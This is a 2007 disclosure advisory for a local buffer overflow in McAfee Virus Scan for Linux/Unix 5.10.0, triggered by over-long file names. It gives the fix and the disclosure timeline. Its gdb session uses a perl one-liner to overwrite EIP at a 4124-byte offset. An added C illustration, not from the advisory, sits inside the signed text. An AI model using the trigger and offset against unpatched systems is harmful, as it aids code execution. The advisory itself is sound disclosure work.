mcafee-advisory-08-2007.txt
Posted Aug 16, 2007
Authored by Sebastian Wolfgarten | Site devtarget.org

A buffer overflow exists in McAfee Virus Scan for Linux and Unix version 5.10.0 that may allow for code execution in the context of the uid running it.

tags | advisory, overflow, code execution, virus
systems | linux, unix
SHA-256 | 653a20317b4d712bb76a36628d0b5713e8e22a2efbfa964476c159add50fc888

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I - TITLE

Security advisory: McAfee Virus Scan for Linux and Unix v5.10.0 Local
Buffer Overflow

II - SUMMARY

Description: Local buffer overflow vulnerability in McAfee Virus Scan
for Linux and Unix allows arbitrary code execution

Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com)

Date: August 15th, 2007

Severity: Low-Medium

References: http://www.devtarget.org/mcafee-advisory-08-2007.txt

III - OVERVIEW

McAfee Virus Scan for Linux and Unix is a command-line version of the
popular McAfee anti-virus scanner running on the Linux operating system
as well as on other Unices (e.g. AIX, Solaris, HP-UX etc.). It was
discovered that the product is prone to a classic buffer overflow
vulnerability when attempting to scan files or directories with a
particularly long name. This vulnerability results in the local
execution of arbitrary code with the privileges of the user running the
scanner; privilege escalation is not possible by default. Remote
exploitation appears to be infeasible due to file name length
limitations in popular file systems.

IV - DETAILS

The overflow occurs when the product tries to scan a file or directory
with a name that is longer than a certain size (approx. 4124+ bytes).
For example, on a Debian Linux 3.1 test system, it takes 4124+4 bytes to
successfully overwrite the EIP register and thus execute arbitrary code:

# /usr/local/uvscan/uvscan --version
Virus Scan for Linux v5.10.0
Copyright (c) 1992-2006 McAfee, Inc. All rights reserved.
(408) 988-3832 EVALUATION COPY - May 26 2006

Scan engine v5.1.00 for Linux.
Virus data file v4777 created Jun 05 2006
Scanning for 194376 viruses, trojans and variants.

# gdb /usr/local/uvscan/uvscan
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions. Type "show copying" to see the conditions. There is
absolutely no warranty for GDB. Type "show warranty" for details. This
GDB was configured as "i386-linux"...(no debugging symbols found)
Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) run `perl -e 'print "A"x4124 . "B"x4'`
Starting program: /usr/local/uvscan/uvscan `perl -e 'print "A"x4124 .
"B"x4'`
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 1080238208 (LWP 2461)]
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1080238208 (LWP 2461)]
0x42424242 in ?? ()
(gdb) info registers
eax 0x1 1
ecx 0x8068430 134644784
edx 0x1 1
ebx 0x41414141 1094795585
esp 0xbfffdc40 0xbfffdc40
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x42424242 0x42424242
eflags 0x282 642
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
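
The bug class described above, shown as an added C example (not code from the advisory or from McAfee): an unchecked copy of a file name into a fixed-size stack buffer beside a length-checked version that rejects over-long names. The 4096-byte buffer size and all function names are assumptions for illustration; the advisory does not show the scanner's own code.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size for illustration; the scanner's real layout is not documented. */
#define NAME_BUF 4096

/* Vulnerable pattern (hypothetical): unchecked copy of a caller-supplied name. */
size_t stage_name_unsafe(const char *arg)
{
    char name[NAME_BUF];
    strcpy(name, arg);          /* overruns name[] once strlen(arg) >= NAME_BUF */
    return strlen(name);
}

/* Hardened form: measure first, reject over-long names, never truncate silently. */
int stage_name_checked(char *dst, size_t dstsz, const char *arg)
{
    size_t n = strlen(arg);
    if (dstsz == 0 || n >= dstsz)
        return -1;
    memcpy(dst, arg, n + 1);    /* n + 1 <= dstsz, copies the terminating NUL too */
    return 0;
}

/* Build a constructed name of `len` bytes and run it through the checked copy. */
int check_name_of_length(size_t len)
{
    char buf[NAME_BUF];
    char *arg = malloc(len + 1);
    int rc;

    if (arg == NULL)
        return -2;
    memset(arg, 'A', len);
    arg[len] = '\0';
    rc = stage_name_checked(buf, sizeof buf, arg);
    if (rc == 0 && strlen(buf) != len)
        rc = -3;                /* copy succeeded but content is wrong */
    free(arg);
    return rc;
}

int main(void)
{
    /* Last entry is the name length used in the advisory's gdb session. */
    size_t lens[] = { 12, NAME_BUF - 1, NAME_BUF, 4124 + 4 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("%zu bytes: %s\n", lens[i],
               check_name_of_length(lens[i]) == 0 ? "accepted" : "rejected");
    return 0;
}
```

Rejecting the name outright, rather than truncating it, keeps the scanner from silently examining a different path than the one it was given.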

V - EXPLOIT CODE

An exploit for this vulnerability has been developed but will not be
released to the general public at this time.

VI - WORKAROUND/FIX

To address this problem, the vendor has released McAfee VirusScan
Command Line Scanner for Linux and Unix version 5.20. Thus all users of
the product are asked to test and install this patch as soon as
possible. McAfee has also published a dedicated security bulletin that
covers the problem (see
https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=613576&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=613576).


VII - DISCLOSURE TIMELINE

18. December 2006 - Notified security@mcafee.com
19. December 2006 - Vendor responded that vulnerability is being
investigated
19. December to 15. August 2007 - Weekly vendor report on the progress
of the development of the patch
01. August 2007 - Release of patch
15. August 2007 - Public disclosure


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFGwvgWd8QFWG1Rza8RAjyeAKC6zp+l6CwLw6/eQ80c6CDue4DpUwCdHtS9
pUdSpbqcZz1QkpM/YDc0dN4=
=PUZy
-----END PGP SIGNATURE-----
